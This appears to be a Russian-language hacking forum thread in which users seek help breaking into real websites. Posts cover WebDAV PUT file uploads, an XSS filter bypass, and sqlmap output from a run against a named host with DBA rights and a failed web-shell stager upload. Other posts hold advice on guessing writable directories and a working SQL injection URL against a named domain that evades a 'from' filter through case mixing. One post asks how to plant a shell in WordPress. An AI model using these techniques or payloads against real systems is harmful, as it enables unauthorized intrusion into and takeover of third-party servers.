WebDAV remote code execution Ya tak ponimay cheres headers PUT sozdaetsya file i dannie tuda pishutsya uje sledueshem zaprosom PUT ? Nujnni primeri Sait na asp , proshu pomoshi P.S. mogu sozdat' cherez PUT file , s razresheniem .jog i .txt , asp i .asp;.jpg ne razreshaet
Запрос: <script>alert();</script> > Ответ : <script>alert();<\/script> Что возможно сделать при таком фильтре ?
Хочу залить шелл, нужно знать путь куда залить. есть доступ к phpinfo () там можно узнать необходимый мне путь?
robot.txt User-Agent: * Disallow: /public_html/Manage~/ Disallow: /public_html/test/ Disallow: /public_html/config.php Allow: / Allow: /public_html/ DOCUMENT_ROOT /home/bomarbg/public_html [01:45:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6.5 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0 [01:45:05] [INFO] going to use a web backdoor for command prompt [01:45:05] [INFO] fingerprinting the back-end DBMS operating system [01:45:05] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > 4 [01:45:06] [WARNING] unable to retrieve automatically the web server document root what do you want to use for writable directory? [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 2 please provide a comma separate list of absolute directory paths: /home/bomarbg/public_html [01:45:10] [WARNING] unable to automatically parse any web server path [01:45:10] [INFO] trying to upload the file stager on '/home/bomarbg/public_html/' via LIMIT 'LINES TERMINATED BY' method [01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/' [01:45:12] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 4 times [01:45:12] [INFO] fetched data logged to text files under 'C:\Users\.sqlmap\output\' [*] shutting down at 01:45:12 magic_quotes_gpc Off current user is DBA: True Могу посмотреть и выводит --users --passwords --privileges --roles --threads=10
Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges . Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads. Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира... Пробуй всякие /images, /temp, /old, /download и т.п. P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?
Я хочу залить shell current user: 'auto12s786@localhost' database management system users privileges: [*] %auto12s786% (administrator) [12]: privilege: CREATE USER privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHUTDOWN privilege: SUPER
Как вариант попробывать вот эту тему: https://rdot.org/forum/showthread.php?t=741 но это только лишь читалка... P.S: Читалку тестировали? load_file()
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,3,4,5-- Хостер фильтрует "from", чем можно заменить или обойти фильтр?
Code: http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+information_schema.tables
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы